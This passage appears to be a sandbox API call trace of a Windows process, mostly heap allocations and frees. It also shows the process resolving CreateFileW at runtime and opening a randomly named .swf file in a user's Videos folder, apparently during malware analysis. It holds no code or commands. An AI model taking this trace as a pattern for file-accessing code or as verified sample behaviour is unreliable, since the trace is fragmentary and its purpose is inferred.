Flags=0x0, Size=0x10) returned 0x43ca928 [0107.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0107.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7d8 [0107.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28e0 [0107.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0107.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0107.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0107.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0107.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9a0 [0107.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0107.537] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0107.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0107.537] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0107.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0107.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0107.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f50 [0107.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca838 [0107.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a10 [0107.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0107.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0107.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0107.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0107.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0107.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0107.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0107.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0107.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0107.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0107.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0107.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0107.538] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0107.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0107.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0107.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0107.538] PeekMessageW (in: lpMsg=0x144e29c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e29c) returned 0 [0107.538] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0107.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa00 [0107.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29d0 [0107.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0107.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0107.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0107.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0107.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0107.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca808 [0107.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29e0 [0107.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca790 [0107.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0107.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0107.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0107.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0107.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0107.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0107.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0107.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0107.539] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2930 | out: hHeap=0x1780000) returned 1 [0107.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0107.539] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0107.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0107.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0107.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0107.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ac0 [0107.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0107.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0107.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0107.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0107.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0107.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0107.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0107.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2950 [0107.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0107.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0107.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0107.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0107.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a00 | out: hHeap=0x1780000) returned 1 [0107.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0107.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0107.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0107.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0107.540] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0107.540] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0107.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a90 [0107.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0107.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a90 | out: hHeap=0x1780000) returned 1 [0107.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0107.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0107.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b20 | out: hHeap=0x1780000) returned 1 [0107.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0107.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0107.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0107.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0107.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0107.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a80 [0107.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0107.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0107.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0107.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0107.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a40 | out: hHeap=0x1780000) returned 1 [0107.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0107.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0107.541] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0107.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0107.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ab0 [0107.541] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0107.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0107.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0107.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0107.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0107.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0107.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0107.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0107.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0107.542] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0107.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0107.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0107.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0107.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0107.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0107.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b10 | out: hHeap=0x1780000) returned 1 [0107.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0107.542] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0107.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0107.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0107.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0107.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0107.542] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0107.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0107.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0107.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0107.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0107.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0107.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0107.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0107.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0107.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0107.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0107.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0107.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0107.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0107.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0107.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29e0 [0107.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0107.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0107.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0107.543] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0107.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0107.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0107.543] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0107.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0107.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0107.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0107.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0107.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0107.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0107.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0107.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0107.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0107.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0107.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0107.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0107.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0107.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0107.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0107.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0107.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0107.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0107.544] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a60 | out: hHeap=0x1780000) returned 1 [0107.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0107.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0107.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0107.544] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0107.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0107.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0107.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0107.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0107.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0107.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0107.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0107.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0107.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0107.545] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0107.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0107.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0107.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0107.545] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0107.545] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0107.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0107.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0107.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0107.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caca0 [0107.546] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43caca0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0107.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0107.546] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0107.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0107.546] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0107.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0107.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0107.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2aa0 [0107.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0107.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0107.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2950 [0107.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0107.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2960 [0107.546] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20002) returned 0x4506008 [0107.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0107.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0107.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0107.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0107.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0107.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0107.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2960 | out: hHeap=0x1780000) returned 1 [0107.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0107.547] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\T H0jeo_wwrX\\pNrmbcA\\yyOweBt9y9iUOOrJX\\vBQeWbI.swf" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\t h0jeo_wwrx\\pnrmbca\\yyowebt9y9iuoorjx\\vbqewbi.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x298 [0107.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0107.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea958 [0107.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01e8 [0107.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0107.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0107.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0107.547] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2970 [0107.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0107.547] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0107.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0107.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0107.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0107.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0107.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ab0 [0107.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0107.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b22250 [0107.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4506008 | out: hHeap=0x1780000) returned 1 [0107.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0107.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0107.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0107.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29a0 [0107.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0107.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29a0 | out: hHeap=0x1780000) returned 1 [0107.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0107.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0107.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0107.548] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0107.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0107.548] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ad0 | out: hHeap=0x1780000) returned 1 [0107.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0107.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae68 | out: hHeap=0x1780000) returned 1 [0107.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0107.549] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0107.549] HeapFree (in: 